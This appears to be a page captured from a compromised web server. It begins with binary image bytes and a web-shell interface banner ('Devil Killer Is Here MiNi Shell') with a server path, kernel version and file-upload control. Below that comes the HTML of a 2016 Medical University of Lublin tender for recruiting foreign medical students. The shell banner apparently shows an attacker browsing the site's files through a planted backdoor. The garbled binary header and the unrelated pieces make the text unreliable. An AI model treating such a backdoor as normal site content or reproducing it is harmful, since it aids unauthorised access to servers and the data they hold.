JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160610/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160610/79821-N-2016.html

<p class="kh_header"><b>Lublin: Usługa rekrutacji studentów z obszaru Bliskiego Wschodu na 6-letni program studiów lekarskich prowadzony w języku angielskim na Uniwersytecie Medycznym w Lublinie oraz usługa rekrutacji studentów z obszaru państw europejskich na 6-letni program studiów lekarskich prowadzony w języku angielskim na Uniwersytecie Medycznym w Lublinie ; UM-ZP-262-31/16</b><br>
<b>Numer ogłoszenia: 79821 - 2016; data zamieszczenia: 10.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Medyczny w Lublinie , Al. Racławickie 1, 20-059 Lublin, woj. lubelskie, tel. 81 4485200, faks 81 4485201.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umlub.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa rekrutacji studentów z obszaru Bliskiego Wschodu na 6-letni program studiów lekarskich prowadzony w języku angielskim na Uniwersytecie Medycznym w Lublinie oraz usługa rekrutacji studentów z obszaru państw europejskich na 6-letni program studiów lekarskich prowadzony w języku angielskim na Uniwersytecie Medycznym w Lublinie ; UM-ZP-262-31/16.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa rekrutacji studentów z obszaru Bliskiego Wschodu na 6-letni program studiów lekarskich prowadzony w języku angielskim na Uniwersytecie Medycznym w Lublinie oraz usługa rekrutacji studentów z obszaru państw europejskich na 6-letni program studiów lekarskich prowadzony w języku angielskim na Uniwersytecie Medycznym w Lublinie.
2. Przedmiot zamówienia został określony w dwóch zadaniach (ofertach częściowych) następująco:
2.1. Zadanie nr 1 - usługa rekrutacji studentów z obszaru Bliskiego Wschodu na 6-letni program studiów lekarskich prowadzony w języku angielskim na Uniwersytecie Medycznym w Lublinie
Przedmiotem zamówienia dla zadania nr 1 jest usługa polegająca na rekrutacji studentów z obszaru Bliskiego Wschodu (w szczególności: Arabia Saudyjska, Jordania, Kuwejt, Zjednoczone Emiraty Arabskie, Oman oraz Irak) na 6 letni program studiów lekarskich prowadzony w języku angielskim na Uniwersytecie Medycznym w Lublinie (zwanym dalej Uniwersytetem) według sześcioletniego programu obowiązującego w Unii Europejskiej z uwzględnieniem rozszerzeń programowych niezbędnych do zdania egzaminów lekarskich obowiązujących w USA. 
Zamawiający wymaga od Wykonawcy usługi zrekrutowania minimum 5 i maksimum 30 studentów na rok akademicki 2016/2017. Rok akademicki obejmuje okres od 1 października do 30 września.
Wykonawca usługi zobowiązuje się do:
a) zapoznania kandydatów z ofertą kształcenia i podstawowymi obowiązkami studentów, o których mowa w §11 oraz  warunkami ponoszenia opłat i dokonywania ich podwyższenia, o których mowa  w §15 ÷ §22 warunków umowy w zakresie zadania nr 1
b) dokonywania rzetelnej weryfikacji uwierzytelnionej dokumentacji kandydatów przedłożonej w języku angielskim lub polskim
c) dostarczenia Uniwersytetowi przy rekomendowaniu kandydatów na studia pełnego kompletu dokumentów wszystkich kandydatów najpóźniej do dnia 30 sierpnia 2016 r.
d) przeprowadzenia - w miarę potrzeb - na koszt kandydatów kursu przygotowującego do przystąpienia do egzaminu wstępnego odbywającego się w języku angielskim , sprawdzającego wiedzę kandydatów z zakresu podstawowych przedmiotów kierunkowych takich jak: biologia, chemia, fizyka
e) poniesienia wszelkich kosztów związanych ze zorganizowaniem kursu przygotowawczego oraz egzaminu kwalifikującego kandydata na studia, bez względu na miejsce ich przeprowadzania, w szczególności zapewnienia miejsca do przeprowadzenia egzaminu (w razie organizowania egzaminu poza siedzibą Zamawiającego pokrycia kosztów dojazdu i zakwaterowania)
Liczba osób ze strony Zamawiającego, obecnych przy egzaminach będzie każdorazowo ustalana wspólnie między Zamawiającym a Wykonawcą
f) zapewnienia przynajmniej jednej osoby posiadającej minimum 3-letnie doświadczenie w prowadzeniu rekrutacji studentów
g) podjęcia wszelkich niezbędnych działań w zakresie reklamy i promocji programu Arabskiego na Uniwersytecie Medycznym w Lublinie celem zabezpieczenia umówionej rekrutacji studentów zagranicznych
h) zapewnienia pomocy studentom zagranicznym w kontaktowaniu się z Zamawiającym, a także w organizacji przylotu do Polski
i) zapewnienia minimum jednej, pełnoletniej osoby (biegle władającej językiem polskim i angielskim) tzw. Asystenta studenta reprezentującego Wykonawcę przez wszystkie lata kształcenia każdego zrekrutowanego przez Wykonawcę studenta przewidziane tokiem studiów w celu pomocy studentom w organizacji spraw socjalno bytowych w Polsce (tj. transport z lotniska, pomoc w zakwaterowaniu, pomoc w załatwianiu spraw zdrowotnych, urzędowych na przykład: poczta, szpital, policja,)
j) zapewnienia zrekrutowanym studentom organizację orientation week, polegającego na zapoznaniu ich z rozkładem budynków Uniwersytetu, w których odbywają się zajęcia oraz innymi podstawowymi kwestiami związanymi z funkcjonowaniem w Polsce przed rozpoczęciem roku akademickiego
k) przedstawienia dostarczonych przez Zamawiającego informacji dotyczących kryteriów przyjęć na studia kandydatom, ich rodzicom i stronom zainteresowanym medycznym programem proponowanym przez Zamawiającego, jak również informacji dotyczących warunków zakwaterowania w Lublinie, programów studiów, obowiązujących podręczników, formularzy, podań etc.
l) zapoznania studentów z podstawowymi obowiązkami, wynikającymi z obowiązujących na Uniwersytecie przepisów
m) pomoc studentom w poszukiwaniu mieszkań.
Wykonawca usługi zobowiązuje się do rekrutacji studentów będących w stanie uiszczać opłatę za czesne w kwocie minimum 15 750,00 USD za pierwszy rok akademicki powiększonej o prowizję należną Rekruterowi, oraz opłatę wpisowego w kwocie 500 USD (nie podlegającą obliczaniu prowizji) a za lata akademickie II - IV czesne w wysokości nie mniejszej niż 15 750,00 USD (nie podlegającej obliczaniu prowizji) oraz V - VI czesne w wysokości nie mniejszej niż 18 000,00 USD (nie podlegającej obliczaniu prowizji).
Wspólny Słownik Zamówień (CPV):   
79000000-4 - Usługi biznesowe: prawnicze, marketingowe, konsultingowe, rekrutacji, drukowania i zabezpieczania
79600000-0 - Usługi rekrutacyjne

2.2. Zadanie nr 2 - usługa rekrutacji studentów z obszaru państw europejskich na 6-letni program studiów lekarskich prowadzony w języku angielskim na Uniwersytecie Medycznym w Lublinie
Przedmiotem zamówienia dla zadania nr 2 jest usługa polegająca na rekrutacji studentów z obszaru państw europejskich na sześcioletni program studiów lekarskich prowadzony w języku angielskim na Uniwersytecie Medycznym w Lublinie (zwanym dalej Uniwersytetem) według sześcioletniego programu obowiązującego w Unii Europejskiej.
Zamawiający wymaga od Wykonawcy usługi zrekrutowania minimum 20 i maksimum 40 studentów na rok akademicki 2016/2017. Rok akademicki obejmuje okres od 1 października do 30 września.
Wykonawca usługi zobowiązuje się do:
a) zapoznania kandydatów z ofertą kształcenia i   podstawowymi obowiązkami studentów  o których mowa w §11 oraz  warunkami ponoszenia opłat i dokonywania ich podwyższenia o których mowa  w §15 ÷ §22 warunków umowy w zakresie zadania nr 2
b) dokonywania rzetelnej weryfikacji uwierzytelnionej dokumentacji kandydatów przedłożonej w języku angielskim lub polskim
c) dostarczenie Uniwersytetowi przy rekomendowaniu kandydatów na studia pełnego kompletu dokumentów wszystkich kandydatów najpóźniej do dnia 30 sierpnia 2016 r.
d) podjęcia wszelkich niezbędnych działań w zakresie reklamy i promocji programu Europejskiego na Uniwersytecie Medycznym w Lublinie celem zabezpieczenia umówionej rekrutacji studentów zagranicznych
e) zapewnienia pomocy studentom zagranicznym w kontaktowaniu się z Zamawiającym, a także w organizacji przylotu do Polski
f) zapewnienia minimum jednej, pełnoletniej osoby (biegle władającej językiem polskim, angielskim) tzw. Asystenta studenta reprezentującego Wykonawcę przez wszystkie lata kształcenia każdego zrekrutowanego przez Wykonawcę studenta przewidziane tokiem studiów w celu pomocy studentom w organizacji spraw socjalno bytowych w Polsce (tj. transport z lotniska, pomoc w zakwaterowaniu, pomoc w załatwianiu spraw zdrowotnych, urzędowych na przykład: poczta, szpital, policja,)
g) zapewnienie zrekrutowanym studentom organizację orientation week, polegającego na zapoznaniu ich z rozkładem budynków Uniwersytetu, w których odbywają się zajęcia oraz innymi podstawowymi kwestiami związanymi z funkcjonowaniem w Polsce przed rozpoczęciem roku akademickiego
h) przedstawienie dostarczonych przez Zamawiającego informacji dotyczących kryteriów przyjęć na studia kandydatom, ich rodzicom i stronom zainteresowanym medycznym programem proponowanym przez Zamawiającego, jak również informacji dotyczących warunków zakwaterowania w Lublinie, programów studiów, obowiązujących podręczników, formularzy, podań etc.
i) zapoznanie studentów z podstawowymi obowiązkami, wynikających z obowiązujących na Uniwersytecie przepisów .
j) pokrycie kosztów egzaminu wstępnego  o ile odbywał się będzie poza siedzibą  Zamawiającego
k) pomoc studentom w poszukiwaniu mieszkań
l) zapewnienia przynajmniej jednej osoby posiadającej minimum 3-letnie doświadczenie w prowadzeniu rekrutacji studentów
Wykonawca usługi zobowiązuje się do rekrutacji studentów będących w stanie uiszczać opłatę za czesne w kwocie minimum 9 900,00 EUR za pierwszy rok akademicki powiększonej o prowizję należną Rekruterowi, oraz opłatę wpisowego w kwocie 500 EUR (nie podlegającą obliczaniu prowizji) a za lata akademickie II - III czesne w wysokości nie mniejszej niż 9 900,00 EUR (nie podlegającej obliczaniu prowizji) oraz IV - VI czesne w wysokości nie mniejszej niż 11 900,00 EUR (nie podlegającej obliczaniu prowizji).
Wspólny Słownik Zamówień (CPV):  
79000000-4 - Usługi biznesowe: prawnicze, marketingowe, konsultingowe, rekrutacji, drukowania i zabezpieczania
79600000-0 - Usługi rekrutacyjne.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.00.00.00-4, 79.60.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od Wykonawców wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie Wykonawcy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast aktualnego odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
2. Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 1, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
3. W przypadku wątpliwości co do treści dokumentu złożonego przez Wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, Zamawiający może zwrócić się do właściwych organów odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, z wnioskiem o udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu.
4. Zgodnie z art. 26 ust. 2b ustawy Pzp Wykonawca może polegać na wiedzy  i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonywania zamówienia.
a)	Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art. 26 ust. 2b ustawy Pzp, odpowiada solidarnie z Wykonawcą za szkodę Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin płatności - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiana postanowień Umowy może nastąpić w formie pisemnego aneksu pod rygorem nieważności w następujących przypadkach:
a) zmiany obowiązujących przepisów, jeżeli konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego.
b) zmiany przepisów dotyczących podatku od towarów i usług .
c) zmiany liczby rekrutowanych studentów;
d) konieczności zmiany osób przewidzianych do wykonania przedmiotu umowy;
e) konieczności zmiany osób nadzorujących prawidłową realizację umowy;
f) konieczności zmiany terminu realizacji przedmiotu umowy z przyczyn niezawinionych przez Strony, zmiana nie może spowodować zmiany ceny wynikającej z oferty Wykonawcy;
g) zaistnienia okoliczności (technicznych, gospodarczych itp.), których nie można było przewidzieć w chwili zawarcia umowy;
h) wystąpienia zdarzeń siły wyższej jako zdarzenia zewnętrzne, niemożliwego do przewidzenia i niemożliwego do zapobieżenia. 
i) zmiany albo rezygnacji z podwykonawcy będącego podmiotem, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b ustawy Pzp, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1. Wykonawca jest obowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia;
j) dopuszczalne będą inne zmiany umowy, o ile nie będą one istotne w stosunku do treści oferty.
2. Inicjatorem zmian może być Zamawiający lub Wykonawca poprzez pisemne wystąpienie w okresie obowiązywania umowy zawierające uzasadnienie proponowanych zmian</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.umlub.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Strona internetowa jw. Osoba do kontaktu: Marlena Żytkowska fax. (81) 4485271; e-mail:m.zytkowska@umlub.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.06.2016 godzina 10:30, miejsce: Kancelaria Ogólna Uniwersytetu Medycznego w Lublinie, Al. Racławickie 1, 20-059
Lublin, pokój nr 8.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Usługa rekrutacji studentów z obszaru Bliskiego Wschodu na 6-letni program studiów lekarskich prowadzony w języku angielskim na Uniwersytecie Medycznym w Lublinie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia dla zadania nr 1 jest usługa polegająca na rekrutacji studentów z obszaru Bliskiego Wschodu (w szczególności: Arabia Saudyjska, Jordania, Kuwejt, Zjednoczone Emiraty Arabskie, Oman oraz Irak) na 6 letni program studiów lekarskich prowadzony w języku angielskim na Uniwersytecie Medycznym w Lublinie (zwanym dalej Uniwersytetem) według sześcioletniego programu obowiązującego w Unii Europejskiej z uwzględnieniem rozszerzeń programowych niezbędnych do zdania egzaminów lekarskich obowiązujących w USA. 
Zamawiający wymaga od Wykonawcy usługi zrekrutowania minimum 5 i maksimum 30 studentów na rok akademicki 2016/2017. Rok akademicki obejmuje okres od 1 października do 30 września.
Wykonawca usługi zobowiązuje się do:
a)	zapoznania kandydatów z ofertą kształcenia i podstawowymi obowiązkami studentów, o których mowa w §11 oraz  warunkami ponoszenia opłat i dokonywania ich podwyższenia, o których mowa  w §15 ÷ §22 warunków umowy w zakresie zadania nr 1
b)	dokonywania rzetelnej weryfikacji uwierzytelnionej dokumentacji kandydatów przedłożonej w języku angielskim lub polskim
c)	dostarczenia Uniwersytetowi przy rekomendowaniu kandydatów na studia pełnego kompletu dokumentów wszystkich kandydatów najpóźniej do dnia 30 sierpnia 2016 r.
d)	przeprowadzenia - w miarę potrzeb - na koszt kandydatów kursu przygotowującego do przystąpienia do egzaminu wstępnego odbywającego się w języku angielskim , sprawdzającego wiedzę kandydatów z zakresu podstawowych przedmiotów kierunkowych takich jak: biologia, chemia, fizyka
e)	poniesienia wszelkich kosztów związanych ze zorganizowaniem kursu przygotowawczego oraz egzaminu kwalifikującego kandydata na studia, bez względu na miejsce ich przeprowadzania, w szczególności zapewnienia miejsca do przeprowadzenia egzaminu (w razie organizowania egzaminu poza siedzibą Zamawiającego pokrycia kosztów dojazdu i zakwaterowania)
